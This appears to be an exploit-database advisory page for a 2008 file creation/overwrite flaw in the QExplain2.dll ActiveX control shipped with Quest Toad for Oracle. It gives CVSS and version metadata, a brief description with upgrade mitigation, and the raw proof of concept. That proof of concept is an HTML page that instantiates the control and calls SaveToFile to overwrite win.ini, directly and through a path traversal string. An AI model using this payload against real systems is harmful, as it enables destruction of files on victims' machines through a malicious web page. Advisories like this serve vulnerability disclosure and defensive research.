Quest Toad for Oracle Explain Plan Display ActiveX Control (QExplain2.dll 6.6.1.1115) Remote File Creation / Overwrite

vendor:

Toad for Oracle

by:

rgod

8,8

CVSS

HIGH

Remote File Creation / Overwrite

434

CWE

Product Name: Toad for Oracle

Affected Version From: 6.6.1.1115

Affected Version To: 6.6.1.1115

Patch Exists: YES

Related CWE: N/A

CPE: a:quest_software:toad_for_oracle:6.6.1.1115

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Quest Toad for Oracle Explain Plan Display ActiveX Control (QExplain2.dll 6.6.1.1115) Remote File Creation / Overwrite

This vulnerability allows an attacker to create or overwrite a file on the vulnerable system. The vulnerability exists due to an ActiveX control (QExplain2.dll 6.6.1.1115) included with Quest Toad for Oracle that fails to properly validate user-supplied input. An attacker can exploit this vulnerability by convincing a user to open a malicious HTML page that contains a malicious script. This script can then be used to create or overwrite a file on the vulnerable system.

Mitigation:

Upgrade to the latest version of Quest Toad for Oracle.

Source

Exploit-DB raw data:

<!-- 
Quest Toad for Oracle Explain Plan Display ActiveX Control (QExplain2.dll 6.6.1.1115)
Remote File Creation / Overwrite 

vendor site: http://www.quest.com/
file tested: Quest_Toad-Development-Suite-for-Oracle_110R2.exe

CLSID: {F7014877-6F5A-4019-A3B2-74077F2AE126}
Progid: QExplain2.ExplainPlanDisplayX
Binary Path: C:\PROGRA~1\COMMON~1\QUESTS~1\QEXPLA~1.DLL
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): True
Safe For Scripting (IObjectSafety): True

rgod
-->
<!-- saved from url=(0014)about:internet --> 
<html>
<object classid='clsid:F7014877-6F5A-4019-A3B2-74077F2AE126' id='obj' width=640 height=480 />
</object>
<script>
try{
obj.SaveToFile("c:\\windows\\win.ini");
}catch(e){
}

try{
obj.SaveToFile("../../../../../../../../../../windows/win.ini");
}catch(e){
}
</script>